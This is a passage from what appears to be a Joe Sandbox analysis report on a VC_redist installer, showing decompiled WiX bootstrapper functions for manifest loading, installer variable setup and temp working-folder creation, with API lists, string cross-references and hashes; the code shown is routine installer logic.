                                                                          																		_t112 = E000BCABE(_t54, 0,  &_v124,  *_t135); // executed
                                                                          																		_t152 = _t112;
                                                                          																		__eflags = _t152;
                                                                          																		if(_t152 >= 0) {
                                                                          																			_t55 = _t142 + 0xbc; // 0xb5371
                                                                          																			_t56 = _t142 + 0x2b0; // 0xb5565
                                                                          																			_t152 = E000BC7DF(_t140, _t56, _t55);
                                                                          																			__eflags = _t152;
                                                                          																			if(_t152 < 0) {
                                                                          																				_push("Failed to load catalog files.");
                                                                          																				goto L38;
                                                                          																			}
                                                                          																		} else {
                                                                          																			_push("Failed to extract bootstrapper application payloads.");
                                                                          																			goto L38;
                                                                          																		}
                                                                          																	} else {
                                                                          																		_push("Failed to get unique temporary folder for bootstrapper application.");
                                                                          																		goto L38;
                                                                          																	}
                                                                          																} else {
                                                                          																	__eflags =  *_t107 - 3;
                                                                          																	if(__eflags == 0) {
                                                                          																		goto L32;
                                                                          																	}
                                                                          																}
                                                                          															} else {
                                                                          																goto L27;
                                                                          															}
                                                                          														}
                                                                          													}
                                                                          												} else {
                                                                          													_t152 = E000B80F6(_t135, L"WixBundleOriginalSource", _t106, 0);
                                                                          													__eflags = _t152;
                                                                          													if(_t152 >= 0) {
                                                                          														goto L24;
                                                                          													} else {
                                                                          														_push("Failed to set original source variable.");
                                                                          														goto L38;
                                                                          													}
                                                                          												}
                                                                          											} else {
                                                                          												_t152 = E000B80F6(_t135, L"WixBundleSourceProcessPath", _t105, 1);
                                                                          												__eflags = _t152;
                                                                          												if(_t152 >= 0) {
                                                                          													_t152 = E000B3446(_t136, _v8,  &_v16);
                                                                          													__eflags = _t152;
                                                                          													if(_t152 >= 0) {
                                                                          														_t152 = E000B80F6(_t135, L"WixBundleSourceProcessFolder", _v16, 1);
                                                                          														__eflags = _t152;
                                                                          														if(_t152 >= 0) {
                                                                          															goto L21;
                                                                          														} else {
                                                                          															_push("Failed to set source process folder variable.");
                                                                          															goto L38;
                                                                          														}
                                                                          													} else {
                                                                          														_push("Failed to get source process folder from path.");
                                                                          														goto L38;
                                                                          													}
                                                                          												} else {
                                                                          													_push("Failed to set source process path variable.");
                                                                          													goto L38;
                                                                          												}
                                                                          											}
                                                                          										} else {
                                                                          											E000F012F(_t149, "Failed to overwrite the %ls built-in variable.", L"WixBundleElevated");
                                                                          										}
                                                                          									} else {
                                                                          										_push("Failed to parse command line.");
                                                                          										goto L38;
                                                                          									}
                                                                          								} else {
                                                                          									_push("Failed to load manifest.");
                                                                          									goto L38;
                                                                          								}
                                                                          							} else {
                                                                          								_push("Failed to get manifest stream from container.");
                                                                          								goto L38;
                                                                          							}
                                                                          						} else {
                                                                          							_push("Failed to open manifest stream.");
                                                                          							goto L38;
                                                                          						}
                                                                          					} else {
                                                                          						_push("Failed to open attached UX container.");
                                                                          						goto L38;
                                                                          					}
                                                                          				} else {
                                                                          					_push("Failed to initialize variables.");
                                                                          					L38:
                                                                          					_push(_t152);
                                                                          					E000F012F();
                                                                          				}
                                                                          				_t116 = _v24;
                                                                          				if(_v24 != 0) {
                                                                          					E000F54EF(_t116);
                                                                          				}
                                                                          				if(_v16 != 0) {
                                                                          					E000F54EF(_v16);
                                                                          				}
                                                                          				_t117 = _v8;
                                                                          				if(_v8 != 0) {
                                                                          					E000F54EF(_t117);
                                                                          				}
                                                                          				E000BC055(_t135,  &_v124);
                                                                          				if(_v28 != 0) {
                                                                          					E000F54EF(_v28);
                                                                          				}
                                                                          				if(_v12 != 0) {
                                                                          					E000F54EF(_v12);
                                                                          				}
                                                                          				if(_v20 != 0) {
                                                                          					E000B3999(_v20); // executed
                                                                          				}
                                                                          				return _t152;
                                                                          			}































                                                                          Strings
                                                                          • WixBundleSourceProcessPath, xrefs: 000C74E6
                                                                          • WixBundleSourceProcessFolder, xrefs: 000C7522
                                                                          • Failed to overwrite the %ls built-in variable., xrefs: 000C74C9
                                                                          • Failed to extract bootstrapper application payloads., xrefs: 000C75DD
                                                                          • Failed to load manifest., xrefs: 000C73F5
                                                                          • Failed to set source process folder variable., xrefs: 000C7533
                                                                          • WixBundleElevated, xrefs: 000C74B3, 000C74C4
                                                                          • Failed to get unique temporary folder for bootstrapper application., xrefs: 000C75BC
                                                                          • Failed to get manifest stream from container., xrefs: 000C73D9
                                                                          • Failed to get source process folder from path., xrefs: 000C7513
                                                                          • WixBundleOriginalSource, xrefs: 000C7547
                                                                          • Failed to load catalog files., xrefs: 000C75FD
                                                                          • Failed to set source process path variable., xrefs: 000C74F7
                                                                          • Failed to open attached UX container., xrefs: 000C739B
                                                                          • Failed to open manifest stream., xrefs: 000C73B8
                                                                          • Failed to set original source variable., xrefs: 000C7558
                                                                          • Failed to parse command line., xrefs: 000C7474
                                                                          • Failed to initialize internal cache functionality., xrefs: 000C758D
                                                                          • Failed to initialize variables., xrefs: 000C737E
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.374205458.00000000000B1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 000B0000, based on PE: true
                                                                          • Associated: 00000005.00000002.374189553.00000000000B0000.00000002.00000001.01000000.0000000A.sdmp
                                                                          • Associated: 00000005.00000002.374381326.00000000000FB000.00000002.00000001.01000000.0000000A.sdmp
                                                                          • Associated: 00000005.00000002.374448562.000000000011A000.00000004.00000001.01000000.0000000A.sdmp
                                                                          • Associated: 00000005.00000002.374477296.000000000011E000.00000002.00000001.01000000.0000000A.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_b0000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: CriticalInitializeSection
                                                                          • String ID: Failed to extract bootstrapper application payloads.$Failed to get manifest stream from container.$Failed to get source process folder from path.$Failed to get unique temporary folder for bootstrapper application.$Failed to initialize internal cache functionality.$Failed to initialize variables.$Failed to load catalog files.$Failed to load manifest.$Failed to open attached UX container.$Failed to open manifest stream.$Failed to overwrite the %ls built-in variable.$Failed to parse command line.$Failed to set original source variable.$Failed to set source process folder variable.$Failed to set source process path variable.$WixBundleElevated$WixBundleOriginalSource$WixBundleSourceProcessFolder$WixBundleSourceProcessPath
                                                                          • API String ID: 32694325-252221001
                                                                          • Opcode ID: c97d9335469b017ed3d53c03c2976a679e307193c78494b27a1133aa71314813
                                                                          • Instruction ID: b2f7e65cde930656dae7657ec6a78acb5984ef49477beb47e11a69d13d10629c
                                                                          • Opcode Fuzzy Hash: c97d9335469b017ed3d53c03c2976a679e307193c78494b27a1133aa71314813
                                                                          • Instruction Fuzzy Hash: E8917972A44A19BBDB229BA4CC41FEEB7ACBF04700F00422AF615E7141D771EA449FD4
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Control-flow Graph

                                                                          [Figure: control-flow graph of function c80ae (legend: Executed / Not Executed); labelled API call nodes: GetCurrentProcess, GetWindowsDirectoryW, GetTempPathW, UuidCreate, StringFromGUID2]
                                                                          C-Code - Quality: 53%
                                                                          			E000C80AE(void* __edx, intOrPtr _a8) {
                                                                          				signed int _v8;
                                                                          				char _v88;
                                                                          				short _v608;
                                                                          				char _v624;
                                                                          				signed int _v628;
                                                                          				void* __ebx;
                                                                          				void* __edi;
                                                                          				void* __esi;
                                                                          				void* __ebp;
                                                                          				signed int _t18;
                                                                          				intOrPtr _t23;
                                                                          				signed int _t32;
                                                                          				signed int _t33;
                                                                          				signed int _t35;
                                                                          				signed int _t38;
                                                                          				signed short _t40;
                                                                          				signed short _t48;
                                                                          				intOrPtr _t51;
                                                                          				void* _t52;
                                                                          				void* _t57;
                                                                          				void* _t58;
                                                                          				signed int _t60;
                                                                          				signed int _t64;
                                                                          				signed int _t68;
                                                                          
                                                                          				_t57 = __edx;
                                                                          				_t18 =  *0x11a008; // 0xf77c1860
                                                                          				_v8 = _t18 ^ _t68;
                                                                          				_v628 = _v628 & 0x00000000;
                                                                          				_t51 = _a8;
                                                                          				E000DF670(_t58,  &_v608, 0, 0x208);
                                                                          				_t59 =  &_v624;
                                                                          				asm("stosd");
                                                                          				asm("stosd");
                                                                          				asm("stosd");
                                                                          				asm("stosd");
                                                                          				_t23 =  *0x11aa94; // 0x0
                                                                          				if(_t23 != 0) {
                                                                          					L17:
                                                                          					_t60 = E000B21A5(_t51, _t23, 0);
                                                                          					__eflags = _t60;
                                                                          					if(_t60 < 0) {
                                                                          						_push("Failed to copy working folder path.");
                                                                          						goto L19;
                                                                          					}
                                                                          				} else {
                                                                          					E000F076C(GetCurrentProcess(),  &_v628); // executed
                                                                          					if(_v628 == 0) {
                                                                          						_t32 = GetTempPathW(0x104,  &_v608);
                                                                          						__eflags = _t32;
                                                                          						if(_t32 != 0) {
                                                                          							goto L10;
                                                                          						} else {
                                                                          							_t40 = GetLastError();
                                                                          							__eflags = _t40;
                                                                          							_t64 =  <=  ? _t40 : _t40 & 0x0000ffff | 0x80070000;
                                                                          							__eflags = _t64;
                                                                          							_t60 =  >=  ? 0x80004005 : _t64;
                                                                          							E000B37D3(0x80004005, "cache.cpp", 0x46b, _t60);
                                                                          							_push("Failed to get temp path for working folder.");
                                                                          							goto L19;
                                                                          						}
                                                                          					} else {
                                                                          						_t59 = 0x104;
                                                                          						if(GetWindowsDirectoryW( &_v608, 0x104) != 0) {
                                                                          							_t60 = E000B338F(_t52, __eflags,  &_v608, 0x104);
                                                                          							__eflags = _t60;
                                                                          							if(_t60 >= 0) {
                                                                          								_t60 = E000B36B4(_t52,  &_v608, 0x104, L"Temp\\");
                                                                          								__eflags = _t60;
                                                                          								if(_t60 >= 0) {
                                                                          									L10:
                                                                          									_t33 =  &_v624;
                                                                          									__imp__UuidCreate(_t33);
                                                                          									_t60 = _t33 | 0x00000001;
                                                                          									__eflags = _t60;
                                                                          									if(_t60 >= 0) {
                                                                          										_t35 =  &_v624;
                                                                          										__imp__StringFromGUID2(_t35,  &_v88, 0x27);
                                                                          										__eflags = _t35;
                                                                          										if(_t35 != 0) {
                                                                          											_push( &_v88);
                                                                          											_t38 = E000B1F20(0x11aa94, L"%ls%ls\\",  &_v608); // executed
                                                                          											_t60 = _t38;
                                                                          											__eflags = _t60;
                                                                          											if(_t60 >= 0) {
                                                                          												_t23 =  *0x11aa94; // 0x0
                                                                          												goto L17;
                                                                          											} else {
                                                                          												_push("Failed to append bundle id on to temp path for working folder.");
                                                                          												goto L19;
                                                                          											}
                                                                          										} else {
                                                                          											_t60 = 0x8007000e;
                                                                          											E000B37D3(_t35, "cache.cpp", 0x475, 0x8007000e);
                                                                          											_push("Failed to convert working folder guid into string.");
                                                                          											goto L19;
                                                                          										}
                                                                          									} else {
                                                                          										_push("Failed to create working folder guid.");
                                                                          										goto L19;
                                                                          									}
                                                                          								} else {
                                                                          									_push("Failed to concat Temp directory on windows path for working folder.");
                                                                          									goto L19;
                                                                          								}
                                                                          							} else {
                                                                          								_push("Failed to ensure windows path for working folder ended in backslash.");
                                                                          								goto L19;
                                                                          							}
                                                                          						} else {
                                                                          							_t48 = GetLastError();
                                                                          							_t67 =  <=  ? _t48 : _t48 & 0x0000ffff | 0x80070000;
                                                                          							_t60 =  >=  ? 0x80004005 :  <=  ? _t48 : _t48 & 0x0000ffff | 0x80070000;
                                                                          							E000B37D3(0x80004005, "cache.cpp", 0x460, _t60);
                                                                          							_push("Failed to get windows path for working folder.");
                                                                          							L19:
                                                                          							_push(_t60);
                                                                          							E000F012F();
                                                                          						}
                                                                          					}
                                                                          				}
                                                                          				return E000DDE36(_t51, _v8 ^ _t68, _t57, _t59, _t60);
                                                                          			}


                                                                          APIs
                                                                          • GetCurrentProcess.KERNEL32(00000000,00000000,?,?), ref: 000C8104
                                                                            • Part of subcall function 000F076C: OpenProcessToken.ADVAPI32(?,00000008,?,?,?,?,?,?,?,000C8110,00000000), ref: 000F078A
                                                                            • Part of subcall function 000F076C: GetLastError.KERNEL32(?,?,?,?,000C8110,00000000), ref: 000F0794
                                                                            • Part of subcall function 000F076C: FindCloseChangeNotification.KERNELBASE(?,?,?,?,?,000C8110,00000000), ref: 000F081D
                                                                          • GetWindowsDirectoryW.KERNEL32(?,00000104,00000000), ref: 000C812A
                                                                          • GetLastError.KERNEL32 ref: 000C8134
                                                                          • GetTempPathW.KERNEL32(00000104,?,00000000), ref: 000C81B1
                                                                          • GetLastError.KERNEL32 ref: 000C81BB
                                                                          Strings
                                                                          • Failed to create working folder guid., xrefs: 000C8207
                                                                          • Failed to copy working folder path., xrefs: 000C827F
                                                                          • cache.cpp, xrefs: 000C8158, 000C81DF, 000C8230
                                                                          • Failed to convert working folder guid into string., xrefs: 000C823A
                                                                          • Failed to append bundle id on to temp path for working folder., xrefs: 000C8264
                                                                          • Failed to get windows path for working folder., xrefs: 000C8162
                                                                          • %ls%ls\, xrefs: 000C824C
                                                                          • Failed to concat Temp directory on windows path for working folder., xrefs: 000C81A1
                                                                          • Failed to ensure windows path for working folder ended in backslash., xrefs: 000C817F
                                                                          • Failed to get temp path for working folder., xrefs: 000C81E9
                                                                          • Temp\, xrefs: 000C8189
                                                                          • @Met, xrefs: 000C8134, 000C81BB
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.374205458.00000000000B1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 000B0000, based on PE: true
                                                                          • Associated: 00000005.00000002.374189553.00000000000B0000.00000002.00000001.01000000.0000000A.sdmp
                                                                          • Associated: 00000005.00000002.374381326.00000000000FB000.00000002.00000001.01000000.0000000A.sdmp
                                                                          • Associated: 00000005.00000002.374448562.000000000011A000.00000004.00000001.01000000.0000000A.sdmp
                                                                          • Associated: 00000005.00000002.374477296.000000000011E000.00000002.00000001.01000000.0000000A.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_b0000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorLast$Process$ChangeCloseCurrentDirectoryFindNotificationOpenPathTempTokenWindows
                                                                          • String ID: %ls%ls\$@Met$Failed to append bundle id on to temp path for working folder.$Failed to concat Temp directory on windows path for working folder.$Failed to convert working folder guid into string.$Failed to copy working folder path.$Failed to create working folder guid.$Failed to ensure windows path for working folder ended in backslash.$Failed to get temp path for working folder.$Failed to get windows path for working folder.$Temp\$cache.cpp
                                                                          • API String ID: 58964441-2272642251
                                                                          • Opcode ID: c7ac3d8a55df5e0a99258fc1c9d1c94954ec9d1fcfdd65be34fcb2980f38cc6f
                                                                          • Instruction ID: 5b7b2f44bd8d6caff38fb172320fb0af479cfb0be97ef868ad88f42199755f99
                                                                          • Opcode Fuzzy Hash: c7ac3d8a55df5e0a99258fc1c9d1c94954ec9d1fcfdd65be34fcb2980f38cc6f
                                                                          • Instruction Fuzzy Hash: 0741E472A40724ABEB60A7A4CD4AFEF73ECAB04710F108169FD45E7181EB749D448BA5
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 1374 b7503-b7dc0 InitializeCriticalSection 1375 b7dc3-b7de0 call b5530 1374->1375 1378 b7ded-b7dfb call f012f 1375->1378 1379 b7de2-b7de9 1375->1379 1382 b7dfe-b7e10 call dde36 1378->1382 1379->1375 1380 b7deb 1379->1380 1380->1382
                                                                          C-Code - Quality: 100%
                                                                          			E000B7503(struct _CRITICAL_SECTION* _a4) {
                                                                          				signed int _v8;
                                                                          				intOrPtr _v12;
                                                                          				char _v16;
                                                                          				char _v20;
                                                                          				intOrPtr _v24;
                                                                          				char* _v28;
                                                                          				intOrPtr _v32;
                                                                          				char _v36;
                                                                          				intOrPtr _v40;
                                                                          				intOrPtr _v44;
                                                                          				char* _v48;
                                                                          				intOrPtr _v52;
                                                                          				char _v56;
                                                                          				char _v60;
                                                                          				intOrPtr _v64;
                                                                          				char* _v68;
                                                                          				intOrPtr _v72;
                                                                          				char _v76;
                                                                          				char _v80;
                                                                          				intOrPtr _v84;
                                                                          				char* _v88;
                                                                          				intOrPtr _v92;
                                                                          				char _v96;
                                                                          				intOrPtr _v100;
                                                                          				intOrPtr _v104;
                                                                          				char* _v108;
                                                                          				intOrPtr _v112;
                                                                          				char _v116;
                                                                          				char _v120;
                                                                          				intOrPtr _v124;
                                                                          				char* _v128;
                                                                          				intOrPtr _v132;
                                                                          				char _v136;
                                                                          				char _v140;
                                                                          				intOrPtr _v144;
                                                                          				char* _v148;
                                                                          				intOrPtr _v152;
                                                                          				char _v156;
                                                                          				char _v160;
                                                                          				intOrPtr _v164;
                                                                          				char* _v168;
                                                                          				intOrPtr _v172;
                                                                          				intOrPtr _v176;
                                                                          				char _v180;
                                                                          				intOrPtr _v184;
                                                                          				char* _v188;
                                                                          				intOrPtr _v192;
                                                                          				char _v196;
                                                                          				char _v200;
                                                                          				intOrPtr _v204;
                                                                          				char* _v208;
                                                                          				intOrPtr _v212;
                                                                          				char _v216;
                                                                          				char _v220;
                                                                          				intOrPtr _v224;
                                                                          				char* _v228;
                                                                          				intOrPtr _v232;
                                                                          				char _v236;
                                                                          				char _v240;
                                                                          				intOrPtr _v244;
                                                                          				char* _v248;
                                                                          				char _v252;
                                                                          				char _v256;
                                                                          				char _v260;
                                                                          				intOrPtr _v264;
                                                                          				char* _v268;
                                                                          				char _v272;
                                                                          				char _v276;
                                                                          				intOrPtr _v280;
                                                                          				intOrPtr _v284;
                                                                          				char* _v288;
                                                                          				char _v292;
                                                                          				char _v296;
                                                                          				intOrPtr _v300;
                                                                          				intOrPtr _v304;
                                                                          				char* _v308;
                                                                          				char _v312;
                                                                          				char _v316;
                                                                          				intOrPtr _v320;
                                                                          				intOrPtr _v324;
                                                                          				char* _v328;
                                                                          				char _v332;
                                                                          				char _v336;
                                                                          				char _v340;
                                                                          				intOrPtr _v344;
                                                                          				char* _v348;
                                                                          				char _v352;
                                                                          				char _v356;
                                                                          				char _v360;
                                                                          				intOrPtr _v364;
                                                                          				char* _v368;
                                                                          				char _v372;
                                                                          				char _v376;
                                                                          				intOrPtr _v380;
                                                                          				intOrPtr _v384;
                                                                          				char* _v388;
                                                                          				char _v392;
                                                                          				char _v396;
                                                                          				intOrPtr _v400;
                                                                          				intOrPtr _v404;
                                                                          				char* _v408;
                                                                          				char _v412;
                                                                          				char _v416;
                                                                          				char _v420;
                                                                          				intOrPtr _v424;
                                                                          				char* _v428;
                                                                          				char _v432;
                                                                          				char _v436;
                                                                          				char _v440;
                                                                          				intOrPtr _v444;
                                                                          				char* _v448;
                                                                          				char _v452;
                                                                          				char _v456;
                                                                          				intOrPtr _v460;
                                                                          				intOrPtr _v464;
                                                                          				char* _v468;
                                                                          				char _v472;
                                                                          				char _v476;
                                                                          				char _v480;
                                                                          				intOrPtr _v484;
                                                                          				char* _v488;
                                                                          				char _v492;
                                                                          				char _v496;
                                                                          				intOrPtr _v500;
                                                                          				intOrPtr _v504;
                                                                          				char* _v508;
                                                                          				char _v512;
                                                                          				char _v516;
                                                                          				intOrPtr _v520;
                                                                          				intOrPtr _v524;
                                                                          				char* _v528;
                                                                          				char _v532;
                                                                          				char _v536;
                                                                          				intOrPtr _v540;
                                                                          				intOrPtr _v544;
                                                                          				char* _v548;
                                                                          				char _v552;
                                                                          				char _v556;
                                                                          				intOrPtr _v560;
                                                                          				intOrPtr _v564;
                                                                          				char* _v568;
                                                                          				char _v572;
                                                                          				char _v576;
                                                                          				char _v580;
                                                                          				intOrPtr _v584;
                                                                          				char* _v588;
                                                                          				char _v592;
                                                                          				char _v596;
                                                                          				intOrPtr _v600;
                                                                          				intOrPtr _v604;
                                                                          				char* _v608;
                                                                          				char _v612;
                                                                          				char _v616;
                                                                          				intOrPtr _v620;
                                                                          				intOrPtr _v624;
                                                                          				char* _v628;
                                                                          				char _v632;
                                                                          				char _v636;
                                                                          				intOrPtr _v640;
                                                                          				intOrPtr _v644;
                                                                          				char* _v648;
                                                                          				char _v652;
                                                                          				char _v656;
                                                                          				intOrPtr _v660;
                                                                          				intOrPtr _v664;
                                                                          				char* _v668;
                                                                          				char _v672;
                                                                          				char _v676;
                                                                          				intOrPtr _v680;
                                                                          				intOrPtr _v684;
                                                                          				char* _v688;
                                                                          				char _v692;
                                                                          				char _v696;
                                                                          				char _v700;
                                                                          				intOrPtr _v704;
                                                                          				char* _v708;
                                                                          				char _v712;
                                                                          				char _v716;
                                                                          				intOrPtr _v720;
                                                                          				intOrPtr _v724;
                                                                          				char* _v728;
                                                                          				char _v732;
                                                                          				char _v736;
                                                                          				intOrPtr _v740;
                                                                          				intOrPtr _v744;
                                                                          				char* _v748;
                                                                          				char _v752;
                                                                          				char _v756;
                                                                          				intOrPtr _v760;
                                                                          				intOrPtr _v764;
                                                                          				char* _v768;
                                                                          				char _v772;
                                                                          				char _v776;
                                                                          				intOrPtr _v780;
                                                                          				intOrPtr _v784;
                                                                          				char* _v788;
                                                                          				char _v792;
                                                                          				char _v796;
                                                                          				intOrPtr _v800;
                                                                          				intOrPtr _v804;
                                                                          				char* _v808;
                                                                          				char _v812;
                                                                          				char _v816;
                                                                          				intOrPtr _v820;
                                                                          				intOrPtr _v824;
                                                                          				char* _v828;
                                                                          				char _v832;
                                                                          				char _v836;
                                                                          				intOrPtr _v840;
                                                                          				intOrPtr _v844;
                                                                          				char* _v848;
                                                                          				char _v852;
                                                                          				char _v856;
                                                                          				intOrPtr _v860;
                                                                          				intOrPtr _v864;
                                                                          				char* _v868;
                                                                          				char _v872;
                                                                          				char _v876;
                                                                          				intOrPtr _v880;
                                                                          				intOrPtr _v884;
                                                                          				char* _v888;
                                                                          				char _v892;
                                                                          				char _v896;
                                                                          				intOrPtr _v900;
                                                                          				intOrPtr _v904;
                                                                          				char* _v908;
                                                                          				char _v912;
                                                                          				char _v916;
                                                                          				char _v920;
                                                                          				intOrPtr _v924;
                                                                          				char* _v928;
                                                                          				char _v932;
                                                                          				char _v936;
                                                                          				intOrPtr _v940;
                                                                          				intOrPtr _v944;
                                                                          				char* _v948;
                                                                          				char _v952;
                                                                          				char _v956;
                                                                          				char _v960;
                                                                          				intOrPtr _v964;
                                                                          				char* _v968;
                                                                          				char _v972;
                                                                          				char _v976;
                                                                          				char _v980;
                                                                          				intOrPtr _v984;
                                                                          				char* _v988;
                                                                          				char _v992;
                                                                          				char _v996;
                                                                          				intOrPtr _v1000;
                                                                          				intOrPtr _v1004;
                                                                          				char* _v1008;
                                                                          				char _v1012;
                                                                          				char _v1016;
                                                                          				intOrPtr _v1020;
                                                                          				intOrPtr _v1024;
                                                                          				char* _v1028;
                                                                          				char _v1032;
                                                                          				char _v1036;
                                                                          				char _v1040;
                                                                          				intOrPtr _v1044;
                                                                          				char* _v1048;
                                                                          				char _v1052;
                                                                          				char _v1056;
                                                                          				char _v1060;
                                                                          				intOrPtr _v1064;
                                                                          				char* _v1068;
                                                                          				char _v1072;
                                                                          				char _v1076;
                                                                          				char _v1080;
                                                                          				intOrPtr _v1084;
                                                                          				char* _v1088;
                                                                          				char _v1092;
                                                                          				char _v1096;
                                                                          				intOrPtr _v1100;
                                                                          				intOrPtr _v1104;
                                                                          				char* _v1108;
                                                                          				char _v1112;
                                                                          				char _v1116;
                                                                          				intOrPtr _v1120;
                                                                          				intOrPtr _v1124;
                                                                          				char* _v1128;
                                                                          				char _v1132;
                                                                          				char _v1136;
                                                                          				intOrPtr _v1140;
                                                                          				intOrPtr _v1144;
                                                                          				char* _v1148;
                                                                          				char _v1152;
                                                                          				char _v1156;
                                                                          				intOrPtr _v1160;
                                                                          				intOrPtr _v1164;
                                                                          				char* _v1168;
                                                                          				char _v1172;
                                                                          				char _v1176;
                                                                          				intOrPtr _v1180;
                                                                          				intOrPtr _v1184;
                                                                          				char* _v1188;
                                                                          				char _v1192;
                                                                          				char _v1196;
                                                                          				intOrPtr _v1200;
                                                                          				intOrPtr _v1204;
                                                                          				char* _v1208;
                                                                          				char _v1212;
                                                                          				char _v1216;
                                                                          				intOrPtr _v1220;
                                                                          				intOrPtr _v1224;
                                                                          				char* _v1228;
                                                                          				struct _CRITICAL_SECTION* _v1232;
                                                                          				void* __ebx;
                                                                          				void* __edi;
                                                                          				void* __esi;
                                                                          				void* __ebp;
                                                                          				signed int _t317;
                                                                          				struct _CRITICAL_SECTION* _t319;
                                                                          				intOrPtr _t320;
                                                                          				intOrPtr _t321;
                                                                          				intOrPtr _t322;
                                                                          				void* _t328;
                                                                          				intOrPtr _t333;
                                                                          				intOrPtr _t335;
                                                                          				intOrPtr _t336;
                                                                          				intOrPtr _t338;
                                                                          				intOrPtr _t342;
                                                                          				intOrPtr _t346;
                                                                          				intOrPtr* _t347;
                                                                          				char _t348;
                                                                          				signed int _t349;
                                                                          
                                                                          				_t317 =  *0x11a008; // 0xf77c1860
                                                                          				_v8 = _t317 ^ _t349;
                                                                          				_t319 = _a4;
                                                                          				_v1232 = _t319;
                                                                          				InitializeCriticalSection(_t319);
                                                                          				_t348 = 0;
                                                                          				_v1228 = L"AdminToolsFolder";
                                                                          				_t320 = 0x2b;
                                                                          				_v1220 = 0x30;
                                                                          				_v1224 = E000B5EAB;
                                                                          				_v1216 = 0;
                                                                          				_t335 = 6;
                                                                          				_v1212 = 0;
                                                                          				_v1208 = L"AppDataFolder";
                                                                          				_v1204 = E000B5EAB;
                                                                          				_v1200 = 0x1a;
                                                                          				_v1196 = 0;
                                                                          				_v1192 = 0;
                                                                          				_v1188 = L"CommonAppDataFolder";
                                                                          				_v1184 = E000B5EAB;
                                                                          				_v1180 = 0x23;
                                                                          				_v1176 = 0;
                                                                          				_v1172 = 0;
                                                                          				_v1168 = L"CommonFiles64Folder";
                                                                          				_v1164 = E000B6418;
                                                                          				_v1160 = _t320;
                                                                          				_v1156 = 0;
                                                                          				_v1152 = 0;
                                                                          				_v1148 = L"CommonFilesFolder";
                                                                          				_v1144 = E000B5EAB;
                                                                          				_v1140 = _t320;
                                                                          				_v1136 = 0;
                                                                          				_v1132 = 0;
                                                                          				_v1128 = L"CommonFiles6432Folder";
                                                                          				_v1124 = E000B5D71;
                                                                          				_v1120 = _t320;
                                                                          				_v1116 = 0;
                                                                          				_v1112 = 0;
                                                                          				_v1108 = L"CompatibilityMode";
                                                                          				_v1104 = E000B6184;
                                                                          				_v1100 = 0xc;
                                                                          				_v1096 = 0;
                                                                          				_v1092 = 0;
                                                                          				_v1088 = L"Date";
                                                                          				_v1084 = E000B5F14;
                                                                          				_v1080 = 0;
                                                                          				_v1076 = 0;
                                                                          				_v1072 = 0;
                                                                          				_v1068 = L"ComputerName";
                                                                          				_v1064 = E000B5E0B;
                                                                          				_v1060 = 0;
                                                                          				_v1056 = 0;
                                                                          				_v1052 = 0;
                                                                          				_v1048 = L"DesktopFolder";
                                                                          				_v1044 = E000B5EAB;
                                                                          				_v1040 = 0;
                                                                          				_v1036 = 0;
                                                                          				_v1032 = 0;
                                                                          				_v1028 = L"FavoritesFolder";
                                                                          				_v1024 = E000B5EAB;
                                                                          				_v1020 = _t335;
                                                                          				_v1016 = 0;
                                                                          				_v1012 = 0;
                                                                          				_v1008 = L"FontsFolder";
                                                                          				_v1004 = E000B5EAB;
                                                                          				_v1000 = 0x14;
                                                                          				_v996 = 0;
                                                                          				_v992 = 0;
                                                                          				_v988 = L"InstallerName";
                                                                          				_v984 = E000B602F;
                                                                          				_v980 = 0;
                                                                          				_v976 = 0;
                                                                          				_v972 = 0;
                                                                          				_v968 = L"InstallerVersion";
                                                                          				_t321 = 5;
                                                                          				_v944 = E000B5EAB;
                                                                          				_v904 = E000B5EAB;
                                                                          				_t333 = 7;
                                                                          				_v840 = _t335;
                                                                          				_t336 = 9;
                                                                          				_v884 = E000B6184;
                                                                          				_v864 = E000B6184;
                                                                          				_v844 = E000B6184;
                                                                          				_v824 = E000B6184;
                                                                          				_v804 = E000B6184;
                                                                          				_v784 = E000B6184;
                                                                          				_v764 = E000B6184;
                                                                          				_v744 = E000B6184;
                                                                          				_t342 = 0xb;
                                                                          				_v964 = E000B605C;
                                                                          				_v960 = 0;
                                                                          				_v956 = 0;
                                                                          				_v952 = 0;
                                                                          				_v948 = L"LocalAppDataFolder";
                                                                          				_v940 = 0x1c;
                                                                          				_v936 = 0;
                                                                          				_v932 = 0;
                                                                          				_v928 = L"LogonUser";
                                                                          				_v924 = E000B60BA;
                                                                          				_v920 = 0;
                                                                          				_v916 = 0;
                                                                          				_v912 = 0;
                                                                          				_v908 = L"MyPicturesFolder";
                                                                          				_v900 = 0x27;
                                                                          				_v896 = 0;
                                                                          				_v892 = 0;
                                                                          				_v888 = L"NTProductType";
                                                                          				_v880 = 4;
                                                                          				_v876 = 0;
                                                                          				_v872 = 0;
                                                                          				_v868 = L"NTSuiteBackOffice";
                                                                          				_v860 = _t321;
                                                                          				_v856 = 0;
                                                                          				_v852 = 0;
                                                                          				_v848 = L"NTSuiteDataCenter";
                                                                          				_v836 = 0;
                                                                          				_v832 = 0;
                                                                          				_v828 = L"NTSuiteEnterprise";
                                                                          				_v820 = E000B5EAB;
                                                                          				_v816 = 0;
                                                                          				_v812 = 0;
                                                                          				_v808 = L"NTSuitePersonal";
                                                                          				_v800 = 8;
                                                                          				_v796 = 0;
                                                                          				_v792 = 0;
                                                                          				_v788 = L"NTSuiteSmallBusiness";
                                                                          				_v780 = _t336;
                                                                          				_v776 = 0;
                                                                          				_v772 = 0;
                                                                          				_v768 = L"NTSuiteSmallBusinessRestricted";
                                                                          				_v760 = 0xa;
                                                                          				_v756 = 0;
                                                                          				_v752 = 0;
                                                                          				_v748 = L"NTSuiteWebServer";
                                                                          				_v740 = E000B6184;
                                                                          				_v736 = 0;
                                                                          				_v732 = 0;
                                                                          				_v728 = L"PersonalFolder";
                                                                          				_v724 = E000B5EAB;
                                                                          				_v720 = _t321;
                                                                          				_v716 = 0;
                                                                          				_v712 = 0;
                                                                          				_v708 = L"Privileged";
